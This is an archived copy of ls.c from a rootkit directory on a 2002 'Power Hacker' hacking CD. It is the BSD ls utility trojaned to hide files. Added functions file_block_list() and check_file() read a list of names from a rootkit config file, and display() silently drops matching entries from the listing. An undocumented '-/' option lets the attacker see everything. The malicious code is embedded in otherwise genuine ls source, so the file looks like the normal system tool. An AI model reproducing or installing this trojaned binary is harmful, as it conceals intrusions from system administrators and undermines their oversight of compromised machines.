Power Hacker 2003

home *** CD-ROM | disk | FTP | other *** search

/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / crh / freebsd / rootkit / ls / ls.c < prev next >

Wrap

C/C++ Source or Header | 2002-05-27 | 14.9 KB | 601 lines

/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ls.c,v 1.10 1996/08/27 21:51:48 adam Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ls.c 8.5 (Berkeley) 4/2/94"; #endif /* not lint */ #include <sys/types.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <dirent.h> #include <err.h> #include <errno.h> #include <fts.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <locale.h> #include "ls.h" #include "extern.h" #include "../config.h" #define STR_SIZE 128 #define SHOWFLAG /* Able to list files with 'ls -/' command */ struct h_st { struct h_st *next; char filename[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; FILE *fp_hack; int showall=0; inline file_block_list() { char LSCONF[10]; LSCONF[0]=ROOTKIT_HIDE_FILES[0]; LSCONF[1]=ROOTKIT_HIDE_FILES[1]; LSCONF[2]=ROOTKIT_HIDE_FILES[2]; LSCONF[3]=ROOTKIT_HIDE_FILES[3]; LSCONF[4]=ROOTKIT_HIDE_FILES[4]; LSCONF[5]=ROOTKIT_HIDE_FILES[5]; LSCONF[6]=ROOTKIT_HIDE_FILES[6]; LSCONF[7]=ROOTKIT_HIDE_FILES[7]; LSCONF[8]=ROOTKIT_HIDE_FILES[8]; LSCONF[9]='\0'; h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if(fp_hack=fopen(LSCONF, "r")) { while(fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strcpy(h_tmp->filename, tmp_str); h_tmp->filename[strlen(h_tmp->filename)-1]='\0'; h_tmp=h_tmp->next; } } h_tmp->next=NULL; } inline int check_file(char *fpath) { for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) if(strstr(fpath, h_tmp->filename)) return(1); return(0); } static int mastercmp __P((const FTSENT **, const FTSENT **)); static void traverse __P((int, char **, int)); static void (*printfcn) __P((DISPLAY *)); static int (*sortfcn) __P((const FTSENT *, const FTSENT *)); long blocksize; /* block size units */ int termwidth = 80; /* default terminal width */ /* flags */ int f_accesstime; /* use time of last access */ int f_column; /* columnated format */ int f_flags; /* show flags associated with a file */ int f_inode; /* print inode */ int f_kblocks; /* print size in kilobytes */ int f_listdir; /* list actual directory, not contents */ int f_listdot; /* list files beginning with . */ int f_longform; /* long listing format */ int f_newline; /* if precede with newline */ int f_nonprint; /* show unprintables as ? */ int f_nosort; /* don't sort output */ int f_recursive; /* ls subdirectories also */ int f_reversesort; /* reverse whatever sort is used */ int f_sectime; /* print the real time for all files */ int f_singlecol; /* use single column output */ int f_size; /* list size in short listing */ int f_statustime; /* use time of last mode change */ int f_dirname; /* if precede with directory name */ int f_timesort; /* sort by time vice name */ int f_type; /* add type character for non-regular files */ int rval; int main(argc, argv) int argc; char *argv[]; { static char dot[] = ".", *dotav[] = { dot, NULL }; struct winsize win; int ch, fts_options, notused; char *p; (void) setlocale(LC_ALL, ""); /* Terminal defaults to -Cq, non-terminal defaults to -1. */ if (isatty(STDOUT_FILENO)) { if (ioctl(STDOUT_FILENO, TIOCGWINSZ, &win) == -1 || !win.ws_col) { if ((p = getenv("COLUMNS")) != NULL) termwidth = atoi(p); } else termwidth = win.ws_col; f_column = f_nonprint = 1; } else { f_singlecol = 1; /* retrieve environment variable, in case of explicit -C */ if ((p = getenv("COLUMNS"))) termwidth = atoi(p); } /* Root is -A automatically. */ if (!getuid()) f_listdot = 1; fts_options = FTS_PHYSICAL; while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu")) != EOF) { switch (ch) { /* * The -1, -C and -l options all override each other so shell * aliasing works right. */ case '1': f_singlecol = 1; f_column = f_longform = 0; break; case 'C': f_column = 1; f_longform = f_singlecol = 0; break; case 'l': f_longform = 1; f_column = f_singlecol = 0; break; /* The -c and -u options override each other. */ case 'c': f_statustime = 1; f_accesstime = 0; break; case 'u': f_accesstime = 1; f_statustime = 0; break; case 'F': f_type = 1; break; case 'L': fts_options &= ~FTS_PHYSICAL; fts_options |= FTS_LOGICAL; break; case 'R': f_recursive = 1; break; case 'a': fts_options |= FTS_SEEDOT; /* FALLTHROUGH */ case 'A': f_listdot = 1; break; /* The -d option turns off the -R option. */ case 'd': f_listdir = 1; f_recursive = 0; break; case 'f': f_nosort = 1; break; case 'g': /* Compatibility with 4.3BSD. */ break; case 'i': f_inode = 1; break; case 'k': f_kblocks = 1; break; case 'o': f_flags = 1; break; case 'q': f_nonprint = 1; break; case 'r': f_reversesort = 1; break; case 's': f_size = 1; break; case 'T': f_sectime = 1; break; case 't': f_timesort = 1; break; case '/': showall++; break; default: case '?': usage(); } } argc -= optind; argv += optind; if (!showall) file_block_list(); /* * If not -F, -i, -l, -s or -t options, don't require stat * information. */ if (!f_inode && !f_longform && !f_size && !f_timesort && !f_type) fts_options |= FTS_NOSTAT; /* * If not -F, -d or -l options, follow any symbolic links listed on * the command line. */ if (!f_longform && !f_listdir && !f_type) fts_options |= FTS_COMFOLLOW; /* If -l or -s, figure out block size. */ if (f_longform || f_size) { if (f_kblocks) blocksize = 2; else { (void)getbsize(¬used, &blocksize); blocksize /= 512; } } /* Select a sort function. */ if (f_reversesort) { if (!f_timesort) sortfcn = revnamecmp; else if (f_accesstime) sortfcn = revacccmp; else if (f_statustime) sortfcn = revstatcmp; else /* Use modification time. */ sortfcn = revmodcmp; } else { if (!f_timesort) sortfcn = namecmp; else if (f_accesstime) sortfcn = acccmp; else if (f_statustime) sortfcn = statcmp; else /* Use modification time. */ sortfcn = modcmp; } /* Select a print function. */ if (f_singlecol) printfcn = printscol; else if (f_longform) printfcn = printlong; else printfcn = printcol; if (argc) traverse(argc, argv, fts_options); else traverse(1, dotav, fts_options); exit(rval); } static int output; /* If anything output. */ /* * Traverse() walks the logical directory structure specified by the argv list * in the order specified by the mastercmp() comparison function. During the * traversal it passes linked lists of structures to display() which represent * a superset (may be exact set) of the files to be displayed. */ static void traverse(argc, argv, options) int argc, options; char *argv[]; { FTS *ftsp; FTSENT *p, *chp; int ch_options; if ((ftsp = fts_open(argv, options, f_nosort ? NULL : mastercmp)) == NULL) err(1, NULL); display(NULL, fts_children(ftsp, 0)); if (f_listdir) return; /* * If not recursing down this tree and don't need stat info, just get * the names. */ ch_options = !f_recursive && options & FTS_NOSTAT ? FTS_NAMEONLY : 0; while ((p = fts_read(ftsp)) != NULL) switch (p->fts_info) { case FTS_DC: warnx("%s: directory causes a cycle", p->fts_name); break; case FTS_DNR: case FTS_ERR: warnx("%s: %s", p->fts_name, strerror(p->fts_errno)); rval = 1; break; case FTS_D: if (p->fts_level != FTS_ROOTLEVEL && p->fts_name[0] == '.' && !f_listdot) break; /* * If already output something, put out a newline as * a separator. If multiple arguments, precede each * directory with its name. */ if (output) (void)printf("\n%s:\n", p->fts_path); else if (argc > 1) { (void)printf("%s:\n", p->fts_path); output = 1; } chp = fts_children(ftsp, ch_options); display(p, chp); if (!f_recursive && chp != NULL) (void)fts_set(ftsp, p, FTS_SKIP); break; } if (errno) err(1, "fts_read"); } /* * Display() takes a linked list of FTSENT structures and passes the list * along with any other necessary information to the print function. P * points to the parent directory of the display list. */ static void display(p, list) FTSENT *p, *list; { struct stat *sp; DISPLAY d; FTSENT *cur; NAMES *np; u_quad_t maxsize; u_long btotal, maxblock, maxinode, maxlen, maxnlink; int bcfile, flen, glen, ulen, maxflags, maxgroup, maxuser; int entries, needstats; char *user, *group, *flags, buf[20]; /* 32 bits == 10 digits */ /* * If list is NULL there are two possibilities: that the parent * directory p has no children, or that fts_children() returned an * error. We ignore the error case since it will be replicated * on the next call to fts_read() on the post-order visit to the * directory p, and will be signalled in traverse(). */ if (list == NULL) return; needstats = f_inode || f_longform || f_size; flen = 0; btotal = maxblock = maxinode = maxlen = maxnlink = 0; bcfile = 0; maxuser = maxgroup = maxflags = 0; flags = NULL; maxsize = 0; for (cur = list, entries = 0; cur; cur = cur->fts_link) { /* Check whether file should be blocked */ if(!showall && check_file(cur->fts_name)) { cur->fts_number=NO_PRINT; continue; } if (cur->fts_info == FTS_ERR || cur->fts_info == FTS_NS) { warnx("%s: %s", cur->fts_name, strerror(cur->fts_errno)); cur->fts_number = NO_PRINT; rval = 1; continue; } /* * P is NULL if list is the argv list, to which different rules * apply. */ if (p == NULL) { /* Directories will be displayed later. */ if (cur->fts_info == FTS_D && !f_listdir) { cur->fts_number = NO_PRINT; continue; } } else { /* Only display dot file if -a/-A set. */ if (cur->fts_name[0] == '.' && !f_listdot) { cur->fts_number = NO_PRINT; continue; } } if (f_nonprint) prcopy(cur->fts_name, cur->fts_name, cur->fts_namelen); if (cur->fts_namelen > maxlen) maxlen = cur->fts_namelen; if (needstats) { sp = cur->fts_statp; if (sp->st_blocks > maxblock) maxblock = sp->st_blocks; if (sp->st_ino > maxinode) maxinode = sp->st_ino; if (sp->st_nlink > maxnlink) maxnlink = sp->st_nlink; if (sp->st_size > maxsize) maxsize = sp->st_size; btotal += sp->st_blocks; if (f_longform) { user = user_from_uid(sp->st_uid, 0); if ((ulen = strlen(user)) > maxuser) maxuser = ulen; group = group_from_gid(sp->st_gid, 0); if ((glen = strlen(group)) > maxgroup) maxgroup = glen; if (f_flags) { flags = flags_to_string(sp->st_flags, "-"); if ((flen = strlen(flags)) > maxflags) maxflags = flen; } else flen = 0; if ((np = malloc(sizeof(NAMES) + ulen + glen + flen + 3)) == NULL) err(1, NULL); np->user = &np->data[0]; (void)strcpy(np->user, user); np->group = &np->data[ulen + 1]; (void)strcpy(np->group, group); if (S_ISCHR(sp->st_mode) || S_ISBLK(sp->st_mode)) bcfile = 1; if (f_flags) { np->flags = &np->data[ulen + glen + 2]; (void)strcpy(np->flags, flags); } cur->fts_pointer = np; } } ++entries; } if (!entries) return; d.list = list; d.entries = entries; d.maxlen = maxlen; if (needstats) { d.bcfile = bcfile; d.btotal = btotal; (void)snprintf(buf, sizeof(buf), "%lu", maxblock); d.s_block = strlen(buf); d.s_flags = maxflags; d.s_group = maxgroup; (void)snprintf(buf, sizeof(buf), "%lu", maxinode); d.s_inode = strlen(buf); (void)snprintf(buf, sizeof(buf), "%lu", maxnlink); d.s_nlink = strlen(buf); (void)snprintf(buf, sizeof(buf), "%qu", maxsize); d.s_size = strlen(buf); d.s_user = maxuser; } printfcn(&d); output = 1; if (f_longform) for (cur = list; cur; cur = cur->fts_link) free(cur->fts_pointer); } /* * Ordering for mastercmp: * If ordering the argv (fts_level = FTS_ROOTLEVEL) return non-directories * as larger than directories. Within either group, use the sort function. * All other levels use the sort function. Error entries remain unsorted. */ static int mastercmp(a, b) const FTSENT **a, **b; { int a_info, b_info; a_info = (*a)->fts_info; if (a_info == FTS_ERR) return (0); b_info = (*b)->fts_info; if (b_info == FTS_ERR) return (0); if (a_info == FTS_NS || b_info == FTS_NS) return (namecmp(*a, *b)); if (a_info == b_info) return (sortfcn(*a, *b)); if ((*a)->fts_level == FTS_ROOTLEVEL) if (a_info == FTS_D) return (1); else if (b_info == FTS_D) return (-1); else return (sortfcn(*a, *b)); else return (sortfcn(*a, *b)); }